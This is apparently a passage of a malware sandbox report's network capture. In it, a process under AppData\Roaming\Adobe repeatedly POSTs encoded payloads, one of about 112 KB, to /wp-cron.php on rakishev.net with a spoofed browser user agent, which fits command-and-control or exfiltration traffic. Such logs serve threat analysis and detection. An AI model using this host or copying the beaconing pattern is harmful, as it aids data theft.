=rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0VYZ7b4KUZrPESt4KOtyH%2BrM7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjy
2023-10-03 20:36:35 UTC	3011	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wxTQnDi1VGmdJBAT4kcEi8ingkn3JpZB7MwCEv77hmvZHL4yf8DSAWOYvtDt3TE4HCfb5%2BiSn6Vk8%2BWu1R3EvtsvqYBEpEUe2iUpZz%2FvEsm%2B7gCqOM6w9Elg7FRen8I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fa67194a05ef-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49855	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:35 UTC	3012	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 310 Expect: 100-continue
2023-10-03 20:36:36 UTC	3012	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:36 UTC	3012	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:36 UTC	3012	OUT	Data Raw: 3d 71 32 49 62 42 53 64 63 4c 47 2f 61 55 62 48 55 6d 43 31 34 6e 72 33 47 72 5a 59 50 4c 65 36 6f 7a 7a 31 25 32 42 62 61 6a 6f 54 6d 6e 6b 37 54 66 31 35 39 25 32 42 65 6c 6b 65 4d 70 61 4b 6e 77 25 32 42 77 59 4c 77 58 4e 4b 78 42 38 79 2f 46 35 7a 74 72 4f 4e 69 68 6b 32 49 58 54 42 62 4e 36 43 64 30 78 36 38 62 4c 4a 38 75 41 42 6d 47 77 46 56 4b 55 57 75 45 79 35 25 32 42 4e 35 35 63 70 51 45 4e 58 48 57 6f 76 32 44 43 5a 54 72 37 58 6a 38 52 74 37 75 53 7a 63 58 72 72 61 2f 59 2f 4c 6c 74 4e 71 4f 77 43 54 50 4f 6f 6f 64 6e 6f 6e 74 6b 73 36 59 34 4f 51 35 63 34 4f 37 75 6a 51 73 36 52 70 72 37 76 76 4c 49 6f 32 57 38 6b 75 53 46 56 36 79 32 44 37 38 6a 4c 34 70 70 2f 43 39 56 51 2f 61 62 6f 62 47 46 4b 54 4d 2f 31 38 4c 6b 51 67 59 43 63 36 68 38 Data Ascii: =q2IbBSdcLG/aUbHUmC14nr3GrZYPLe6ozz1%2BbajoTmnk7Tf159%2BelkeMpaKnw%2BwYLwXNKxB8y/F5ztrONihk2IXTBbN6Cd0x68bLJ8uABmGwFVKUWuEy5%2BN55cpQENXHWov2DCZTr7Xj8Rt7uSzcXrra/Y/LltNqOwCTPOoodnontks6Y4OQ5c4O7ujQs6Rpr7vvLIo2W8kuSFV6y2D78jL4pp/C9VQ/abobGFKTM/18LkQgYCc6h8
2023-10-03 20:36:36 UTC	3012	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ifw6cUwNjsfoC%2F9tS4WswRINLZ%2BM6OVbNxwkNwcn1mOA%2Bfjd0b2woGdsEkxTyYZcXwuGcXI4A0ldPsL6odM%2B67BZUkkxqc5jibba%2FD0XgQvPdvdxd6rDeQMgyrrsaOw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fa6d7a8b083a-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49856	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:37 UTC	3013	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 558 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:37 UTC	3013	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:37 UTC	3013	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:37 UTC	3013	OUT	Data Raw: 3d 47 76 59 71 38 73 49 78 6c 71 6e 65 47 6b 77 75 42 53 51 44 45 63 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 4f 74 30 50 71 45 72 78 4b 58 6b 42 57 4f 57 6b 59 31 66 65 45 63 61 4f 43 64 72 77 68 70 49 34 5a 5a 58 78 61 4c 31 75 63 74 63 69 53 49 45 71 6c 43 67 58 49 68 25 32 42 79 59 37 52 74 4f 7a 69 77 78 4b 44 34 39 76 71 54 33 46 75 61 66 56 2f 62 58 64 58 25 32 42 59 51 6b 59 76 52 36 47 69 53 41 76 68 57 50 58 49 74 39 54 42 44 55 72 2f 65 66 67 31 36 4e 5a 70 6f 35 6a 66 47 68 70 4d 5a 70 62 6a 50 63 4d 73 49 4f 7a 63 32 56 33 56 44 50 42 2f 66 42 52 6a 76 39 66 46 59 39 43 44 33 69 4e 54 6a 63 Data Ascii: =GvYq8sIxlqneGkwuBSQDEcNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJROt0PqErxKXkBWOWkY1feEcaOCdrwhpI4ZZXxaL1uctciSIEqlCgXIh%2ByY7RtOziwxKD49vqT3FuafV/bXdX%2BYQkYvR6GiSAvhWPXIt9TBDUr/efg16NZpo5jfGhpMZpbjPcMsIOzc2V3VDPB/fBRjv9fFY9CD3iNTjc
2023-10-03 20:36:37 UTC	3014	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XvfHAdR5YSWukUSvcHIZkGAaZ25gUbPcdYPyodvQb9DbjDueuIEqUFyzgvzrXSOViEH%2Bl9cPGsjSMOwv05T3%2FfmBeM3jjarWuRTnVqCugjZ3MeoqBEa3WV2mpb6f5eM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fa752ce813bc-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49866	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:47 UTC	3014	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue
2023-10-03 20:36:47 UTC	3015	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:47 UTC	3015	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:47 UTC	3015	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 70 66 4c 6f 42 34 76 56 2f 66 4c 6f 63 36 4c 6e 46 53 52 61 43 73 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0VpfLoB4vV/fLoc6LnFSRaCs7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY
2023-10-03 20:36:47 UTC	3126	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QPtfDIOHeRphjcZlo4U4hNOWsMH6ZGDYTwAmfeyW0yWyhiCoJEJ4yT%2FcG02cM%2FD7bucjmxCcjz0rFiPGRBdEh74AbXfBcfRyg%2FCAos6%2BFRPIjtLezktYSQ7cCm7b4OE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fab34b1d07f8-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49867	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:47 UTC	3015	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:47 UTC	3015	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:47 UTC	3015	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:47 UTC	3015	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49868	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:47 UTC	3015	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112852 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:47 UTC	3016	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:47 UTC	3016	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:47 UTC	3016	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 4a 4a 6c 75 48 31 4b 35 42 73 65 78 4a 41 53 7a 4c 5a 76 49 55 49 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUJJluH1K5BsexJASzLZvIUIIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:36:47 UTC	3032	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:36:47 UTC	3032	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:36:47 UTC	3048	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:36:47 UTC	3048	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:36:47 UTC	3064	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:36:47 UTC	3064	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:36:47 UTC	3079	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:36:47 UTC	3079	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:36:47 UTC	3095	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:36:47 UTC	3095	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:36:47 UTC	3111	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:36:47 UTC	3111	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49779	136.144.57.121	443	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:35:10 UTC	2777	OUT	GET /windows-client/latest.sig HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: WireGuard/0.5.3 (Windows 10.0.17134; amd64) Host: download.wireguard.com
2023-10-03 20:35:10 UTC	2777	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:35:10 GMT Content-Type: application/octet-stream Content-Length: 436 Last-Modified: Wed, 22 Dec 2021 17:52:10 GMT Connection: close ETag: "61c365ca-1b4" Server: ZX2C4 Web Server Strict-Transport-Security: max-age=15768020; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2023-10-03 20:35:10 UTC	2778	IN	Data Raw: 75 6e 74 72 75 73 74 65 64 20 63 6f 6d 6d 65 6e 74 3a 20 76 65 72 69 66 79 20 77 69 74 68 20 77 69 72 65 67 75 61 72 64 2d 77 69 6e 64 6f 77 73 2d 72 65 6c 65 61 73 65 2e 70 75 62 0a 52 57 52 4e 71 47 4b 74 42 58 66 74 4b 51 39 43 31 45 5a 34 49 2b 33 38 4c 71 52 69 63 61 64 58 32 49 59 62 46 70 48 55 70 77 55 73 5a 47 52 76 35 55 66 67 67 66 69 68 4e 67 76 45 6c 70 62 57 50 59 4c 79 34 49 66 76 31 39 38 43 31 65 53 64 62 45 54 46 4a 46 46 72 75 51 78 33 64 41 39 56 53 67 77 3d 0a 37 30 65 65 64 66 62 37 61 61 61 33 37 62 38 36 35 31 64 62 32 31 32 30 63 37 39 35 38 62 65 65 62 30 33 31 39 63 66 64 65 61 38 39 30 38 61 39 30 61 64 30 61 39 35 66 65 63 32 38 64 62 33 39 20 20 77 69 72 65 67 75 61 72 64 2d 61 6d 64 36 34 2d 30 2e 35 2e 33 2e 6d 73 69 0a 34 Data Ascii: untrusted comment: verify with wireguard-windows-release.pubRWRNqGKtBXftKQ9C1EZ4I+38LqRicadX2IYbFpHUpwUsZGRv5UfggfihNgvElpbWPYLy4Ifv198C1eSdbETFJFFruQx3dA9VSgw=70eedfb7aaa37b8651db2120c7958beeb0319cfdea8908a90ad0a95fec28db39 wireguard-amd64-0.5.3.msi4

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49877	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:58 UTC	3127	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:58 UTC	3127	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:58 UTC	3127	OUT	Data Raw: 70 Data Ascii: p
